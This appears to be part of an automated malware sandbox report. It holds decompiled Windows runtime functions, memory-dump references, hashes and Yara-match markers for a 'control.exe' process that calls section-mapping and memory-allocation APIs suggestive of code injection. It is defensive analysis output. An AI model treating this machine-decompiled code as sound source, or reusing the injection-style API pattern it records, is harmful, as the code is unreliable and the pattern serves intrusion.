Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: c2dee7a0b200185f6326e00aa31b5f7c4f710de3fe34766f06c91ac1e87e48cd
Instruction ID: 105bb517aff6fd2cc6f1d1bd75ef5c64d5a536ca235f52e48ce92bb57fb60843
Opcode Fuzzy Hash: c2dee7a0b200185f6326e00aa31b5f7c4f710de3fe34766f06c91ac1e87e48cd
Instruction Fuzzy Hash: 03510771640705ABDB159B28CC81FE7739CAF94360F11862AFD19DB281EA75ED8187A0

Uniqueness

Uniqueness Score: -1.00%

Function 009DEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E009DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E009CDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xa9793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009B16C0(_t39);
				} else {
					_t40 = E009AF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E009F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009B01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xa9793c; // 0x0
								_push(_t85);
								_t44 = E009B1F28(_t71);
							} else {
								_t44 = E009AF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E009F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00A32306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E009DEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E009F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A03F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A03F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xa920c0;
								if(_t85 != 0xa920c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00A3217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A03F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x009dec56
0x009dec56
0x009dec56
0x009dec5c
0x009dec64
0x00a123e6
0x00a123eb
0x00a123eb
0x009dec6a
0x009dec6c
0x009dec6f
0x00a123f3
0x00a123f8
0x00a123fa
0x00a123fc
0x009dec75
0x009dec76
0x009dec76
0x009dec7b
0x009dec7c
0x009dec7e
0x00a12406
0x00a12407
0x00a1240c
0x00a1240d
0x00a1240d
0x00a1240d
0x00a12414
0x00a12417
0x00a1241e
0x00a12435
0x00a12438
0x00a1243c
0x00a1243f
0x00a12442
0x00a12443
0x00a12446
0x00a12449
0x00a12453
0x00a12455
0x00a1245b
0x00a1245b
0x009deb99
0x009deb99
0x009deb9c
0x009deb9d
0x009deb9f
0x009deba2
0x00a12465
0x00a1246b
0x00a1246d
0x009deba8
0x009deba9
0x009deba9
0x009debae
0x009debb3
0x009debb9
0x009debbb
0x00a12513
0x00a12514
0x00a12519
0x00a1251b
0x009dec2a
0x009dec2d
0x009dec33
0x009dec36
0x009dec3a
0x009dec3e
0x009dec40
0x009dec47
0x009dec47
0x009dec40
0x009b22c6
0x009debc1
0x009debc1
0x009debc5
0x009dec9a
0x009dec9a
0x009debd6
0x009debd6
0x00000000
0x009debbb
0x00a12477
0x00a1247c
0x00a12486
0x00a1248b
0x00a12496
0x00a1249b
0x00a1249d
0x00a124a0
0x00a124a3
0x00a124aa
0x00a124aa
0x00a124a5
0x00a124a5
0x00a124a5
0x00a124ac
0x00a124af
0x00a124b0
0x00a124b3
0x00a124b9
0x00a124ba
0x00a124bb
0x00a124c6
0x00a124cb
0x00a124cd
0x00a124d0
0x00a124d1
0x00a124d4
0x00a124d6
0x00a124d9
0x00a124d9
0x00a124dc
0x00a124df
0x00a124e1
0x00a124e7
0x00a124e9
0x00a124ec
0x00a124ef
0x00a124f2
0x00a124f2
0x00a124ef
0x00a124e7
0x00a124fa
0x00a124ff
0x00a12501
0x00a12503
0x00a12506
0x00a1250b
0x009deb8c
0x009deb93
0x00000000
0x00000000
0x009deb93
0x00000000
0x009deb99
0x009dec85
0x009dec85
0x009dec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A124BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A1248D
RTL: Re-Waiting, xrefs: 00A124FA

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 433ef0a57b163ead6c22949784bd2ba7f5d2452b372e24121a25b0d8cb7cb23b
Instruction ID: 37538f85dbec3d9d18a931b4a39ad142e806e836cf187a753030cf1025c7fe0d
Opcode Fuzzy Hash: 433ef0a57b163ead6c22949784bd2ba7f5d2452b372e24121a25b0d8cb7cb23b
Instruction Fuzzy Hash: 9E41F870600204ABCB24EF68DD85FAA77A8EF84720F208A16F555DF3D1D778E99187A1

Uniqueness

Uniqueness Score: -1.00%

Function 009EFCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E009EEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E009EEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E009E685D(_t167, 4) == 0) {
								if(E009E685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E009E685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E009E685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E009C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E009BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E009EEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E009EEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x009efcd1
0x009efcd6
0x009efcd9
0x009efcdc
0x009efcdf
0x009efce2
0x009efce5
0x009efce8
0x009efceb
0x009efced
0x009efced
0x009efcf3
0x00000000
0x00000000
0x009efcfc
0x009efcfe
0x009efdc1
0x00a1ecbd
0x00000000
0x00a1eccc
0x00a1eccc
0x00a1ecd2
0x00000000
0x00000000
0x00a1ecdf
0x00a1ece0
0x00a1ece4
0x00a1eceb
0x00a1ecee
0x00a1eca8
0x00a1eca8
0x00a1ecaa
0x009efd76
0x009efd79
0x009efdb4
0x009efdb5
0x009efdb6
0x00000000
0x009efdb6
0x009efd7e
0x00a1ecfc
0x009efe2f
0x00000000
0x009efe2f
0x00a1ed08
0x00a1ed0f
0x00a1ed17
0x00a1ed1b
0x00000000
0x00a1ed1b
0x009efd88
0x00000000
0x00000000
0x009efd94
0x009efd99
0x009efda1
0x00000000
0x00000000
0x009efdb0
0x00000000
0x009efdb0
0x00a1ecbd
0x009efdc7
0x009efdcb
0x00000000
0x009efdd7
0x009efde3
0x009efe06
0x00a01fe7
0x00000000
0x00000000
0x00a01fef
0x00a01ff0
0x00a01ff4
0x00a01ff7
0x00a01ffa
0x00a01ffd
0x00a02000
0x00000000
0x00000000
0x00a1ecf1
0x00000000
0x00a1ecf1
0x00000000
0x009efe06
0x009efde8
0x009efdec
0x009efdef
0x009efdf2
0x00000000
0x009efdf2
0x009efdcb
0x009efd04
0x009efd05
0x00a1ec67
0x00000000
0x00000000
0x00a1ec6f
0x00000000
0x00a1ec6f
0x009efd13
0x009efd3c
0x009efd40
0x00a1ec75
0x00a1ec7a
0x00000000
0x00a1ec8a
0x00a1ec8a
0x00a1ec90
0x00a1ecb2
0x009efd73
0x009efd73
0x00000000
0x009efd73
0x00a1ec95
0x00000000
0x00000000
0x00a1eca1
0x00a1eca4
0x00a1eca5
0x00000000
0x00a1eca5
0x00a1ec7a
0x009efd4a
0x00000000
0x009efd6e
0x009efd6e
0x009efd71
0x00000000
0x009efd71
0x009efd4a
0x009efd21
0x009fa3a1
0x00000000
0x009fa3a1
0x009efd36
0x00a0200b
0x00a02012
0x00000000
0x00000000
0x00a02018
0x00000000
0x00a02018
0x00000000
0x009efd36
0x009efe0f
0x009efe16
0x009fa3ad
0x00000000
0x00000000
0x009fa3b3
0x009fa3b3
0x009efe1f
0x00a1ed25
0x00a1ed86
0x00000000
0x00000000
0x00a1ed91
0x00a1ed95
0x00a1ed95
0x00a1ed9a
0x00a1edad
0x00a1edb3
0x00a1edba
0x00a1edc4
0x00a1edc9
0x00000000
0x00a1edcc
0x00a1ed2a
0x00a1ed55
0x00000000
0x00000000
0x00a1ed61
0x00a1ed66
0x00a1ed6e
0x00000000
0x00000000
0x00a1ed7d
0x00000000
0x00a1ed7d
0x00a1ed30
0x00000000
0x00000000
0x00a1ed3c
0x00a1ed43
0x00a1ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 009EFD94

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: b8d89b591b0596be336de950b2a42c5442b94efa075d8c47f9a7ca32712a2d25
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: B6918031D0028AEBDF26CF5AC8556EEB7B4EF55314F24847BD801A7192E7305E81CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 2016 Parent PID: 1764 control.exeCOMMON

Executed Functions

Function 01D56F06, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 482nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 01D5706F

Strings

0, xrefs: 01D570F7

Memory Dump Source

Source File: 00000008.00000002.676075615.0000000001D50000.00000040.00000001.sdmp, Offset: 01D50000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
Instruction ID: 90545bc7b9896ce546f7d05faac4d1e5fa08b4a24027094e2437aca602e93689
Opcode Fuzzy Hash: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
Instruction Fuzzy Hash: BFF13170518A8D8FDFA9EF68C894AEEBBE1FB98305F40462ED84AD7250DF349541CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01D56A82, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 01D56B63
NtMapViewOfSection.NTDLL ref: 01D56BCF
NtClose.NTDLL ref: 01D56C95

Strings

@, xrefs: 01D56B5B
@, xrefs: 01D56BDC

Memory Dump Source

Source File: 00000008.00000002.676075615.0000000001D50000.00000040.00000001.sdmp, Offset: 01D50000, based on PE: false

Similarity

API ID: Section$CloseCreateView
String ID: @$@
API String ID: 1133238012-149943524
Opcode ID: 2b54346af0ac501a774fccb99c06c87377621fe434376dcf0e016e6d88475c0a
Instruction ID: 7e709d1c4319806634addedad6b63c9019685bcaba3a481b28d5ad159fee187a
Opcode Fuzzy Hash: 2b54346af0ac501a774fccb99c06c87377621fe434376dcf0e016e6d88475c0a
Instruction Fuzzy Hash: 6361837061CB498FCB58EF58D8856AABBE0FF98314F50062EE98AC3651DF35D441CB86

Uniqueness

Uniqueness Score: -1.00%

Function 01D56F12, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 01D5706F

Strings

0, xrefs: 01D56F9D

Memory Dump Source

Source File: 00000008.00000002.676075615.0000000001D50000.00000040.00000001.sdmp, Offset: 01D50000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
Instruction ID: 35e745f0232899682f3e2ef8276d83c6fa3eaa36d2ef57d3f9c6941d6154412a
Opcode Fuzzy Hash: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
Instruction Fuzzy Hash: 13514370918A8D8FDBA5EF68C8946EDBBF4FB98305F40462ED84AD7250DF309545CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001185F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00113BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00113BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0011863D

Strings

.z`, xrefs: 0011862D, 00118638

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 28153881a8632bd072360b91540be560e9192c22fd8c2011693b52eb1d47bf69
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 08F0BDB2200208ABCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001186A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00113D82,5E972F65,FFFFFFFF,00113A41,?,?,00113D82,?,00113A41,FFFFFFFF,5E972F65,00113D82,?,00000000), ref: 001186E5

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 54ef6ce0f14df09344757e15c7eaabff44079611cc59124d2af0a3c891b7a3b4
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 82F0A4B2200208ABCB18DF89DC95EEB77ADAF8C754F158258BE1D97241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0011871B, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00113D60,?,?,00113D60,00000000,FFFFFFFF), ref: 00118745

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 61777a9092b4a2ee9ea7b4cd160a74e3995bf1f88e2201a889943988f2351779
Instruction ID: 5d019d95f054c4ae6a2e48a85a0e380bb01d157ff31cd42dc2bfef00ffa95da9
Opcode Fuzzy Hash: 61777a9092b4a2ee9ea7b4cd160a74e3995bf1f88e2201a889943988f2351779
Instruction Fuzzy Hash: 48F08276200214BBDB14EF98DC84EE773ADEF88320F108559FA5C9B241C630E955CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001187CA, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00102D11,00002000,00003000,00000004), ref: 00118809

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9ae74c0119e2be0318d6d9e42e3c7bc527e15505ccda238c493dfccce67c5a65
Instruction ID: 81379fe87128c6791903251d8a55d4d3b9bec88167f5d19c357654e06d3a674c
Opcode Fuzzy Hash: 9ae74c0119e2be0318d6d9e42e3c7bc527e15505ccda238c493dfccce67c5a65
Instruction Fuzzy Hash: 3BF0FEB12502197FDB14DF89CC81EAB77ADBF88654F114159BE1897282C630E811CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 001187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00102D11,00002000,00003000,00000004), ref: 00118809

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: aa81e81ac09ebb418a0854f7181f9a045a69d1439815f3302da591706d50e4c6
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: ADF015B2200208ABCB18DF89CC81EEB77ADAF88750F118158BE1897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00118720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00113D60,?,?,00113D60,00000000,FFFFFFFF), ref: 00118745

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: d54d1262b1c27b836bd5401cb151f25618a549e213a203887a96ce0e8e9e623a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 82D012752002147BD714EB98CC85ED7775CEF44760F154455BA185B242C530F54086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01E100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E100CF

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 01E107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E107B7

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

